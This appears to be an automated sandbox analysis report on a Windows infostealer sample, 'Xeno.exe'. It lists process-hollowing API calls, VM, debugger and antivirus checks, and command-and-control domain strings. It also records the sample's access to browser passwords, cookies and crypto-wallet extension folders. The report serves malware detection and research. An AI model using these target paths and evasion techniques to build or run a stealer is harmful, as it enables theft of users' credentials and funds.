                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00435030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 1_2_00435030
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_03271000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber, 1_2_03271000
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_004351D0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectObject,BitBlt,SelectObject,DeleteDC, 1_2_004351D0
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: String function: 00413BD0 appears 121 times
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: String function: 00407E80 appears 49 times
                      Source: C:\Users\user\Desktop\Xeno.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924
                      Source: Xeno.exe | Static PE information: invalid certificate
                      Source: Xeno.exe, 00000000.00000002.1846632115.000000000125E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Xeno.exe
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHandler.exe0 vs Xeno.exe
                      Source: Xeno.exe, 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHandler.exe0 vs Xeno.exe
                      Source: Xeno.exe | Binary or memory string: OriginalFilenameHandler.exe0 vs Xeno.exe
                      Source: Xeno.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: Xeno.exe | Static PE information: Section: .idata ZLIB complexity 1.0003388400163666
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/5@1/1
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00439FE0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 1_2_00439FE0
                      Source: C:\Users\user\Desktop\Xeno.exe | Mutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5544
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\4c56b1cb-5b0c-4434-a4bd-c8256ae06dbf
                      Source: Xeno.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Xeno.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Xeno.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Xeno.exe | Virustotal: Detection: 47%
                      Source: Xeno.exe | ReversingLabs: Detection: 60%
                      Source: C:\Users\user\Desktop\Xeno.exe | File read: C:\Users\user\Desktop\Xeno.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"
                      Source: C:\Users\user\Desktop\Xeno.exe | Process created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"
                      Source: C:\Users\user\Desktop\Xeno.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: webio.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Xeno.exe | Section loaded: profapi.dll
                      Source: Xeno.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Xeno.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Xeno.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Windows.Forms.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: Manjohn.pdbt-^q source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.pdbh source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: Manjohn.pdb source: Xeno.exe, WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.ni.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Xeno.exe | Static PE information: 0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00443A67 push eax; ret 1_2_00443A6A
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00447A70 push edi; iretd 1_2_00447A72
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00444AA3 push eax; retf 1_2_00444AA4
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00447B7C push ss; iretd 1_2_00447BBB
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_0043FDF0 push eax; mov dword ptr [esp], C0C3C2F5h 1_2_0043FDF2
                      Source: C:\Users\user\Desktop\Xeno.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\Xeno.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Xeno.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\Xeno.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\Xeno.exe | System information queried: FirmwareTableInformation
                      Source: C:\Users\user\Desktop\Xeno.exe | Memory allocated: 1230000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Xeno.exe | Memory allocated: 2F90000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Xeno.exe | Memory allocated: 1590000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Xeno.exe | Window / User API: threadDelayed 6089
                      Source: C:\Users\user\Desktop\Xeno.exe TID: 4124 | Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\Desktop\Xeno.exe TID: 1508 | Thread sleep count: 6089 > 30
                      Source: C:\Users\user\Desktop\Xeno.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\Xeno.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\Xeno.exe | Last function: Thread delayed
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Xeno.exe, 00000001.00000002.2942807355.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, Xeno.exe, 00000001.00000002.2942665593.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
                      Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
                      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\Xeno.exe | API call chain: ExitProcess graph end node | graph_1-13902
                      Source: C:\Users\user\Desktop\Xeno.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Xeno.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Xeno.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_0043E7C0 LdrInitializeThunk | 1_2_0043E7C0
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 0_2_02F97F41 mov edi, dword ptr fs:[00000030h] | 0_2_02F97F41
                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 0_2_02F980BE mov edi, dword ptr fs:[00000030h] | 0_2_02F980BE
                      Source: C:\Users\user\Desktop\Xeno.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Xeno.exe | Code function: 0_2_02F97F41 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread | 0_2_02F97F41
                      Source: C:\Users\user\Desktop\Xeno.exe | Memory written: C:\Users\user\Desktop\Xeno.exe base: 400000 value starts with: 4D5A
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: growthselec.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: immolatechallen.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: crookedfoshe.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: strivehelpeu.bond
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sobrattyeu.bond
                      Source: C:\Users\user\Desktop\Xeno.exe | Process created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"
                      Source: C:\Users\user\Desktop\Xeno.exe | Queries volume information: C:\Users\user\Desktop\Xeno.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Xeno.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Xeno.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\Xeno.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Xeno.exe, 00000001.00000002.2942920179.0000000000D22000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %\Windows Defender\MsMpeng.exe
                      Source: Xeno.exe, 00000001.00000002.2942776722.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
                      Source: C:\Users\user\Desktop\Xeno.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match | File source: Process Memory Space: Xeno.exe PID: 3020, type: MEMORYSTR
                      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara match | File source: Xeno.exe, type: SAMPLE
                      Source: Yara match | File source: 0.0.Xeno.exe.b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Xeno.exe.3f99550.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Xeno.exe.3f99550.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: set_UseMachineKeyStore
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                      Source: C:\Users\user\Desktop\Xeno.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
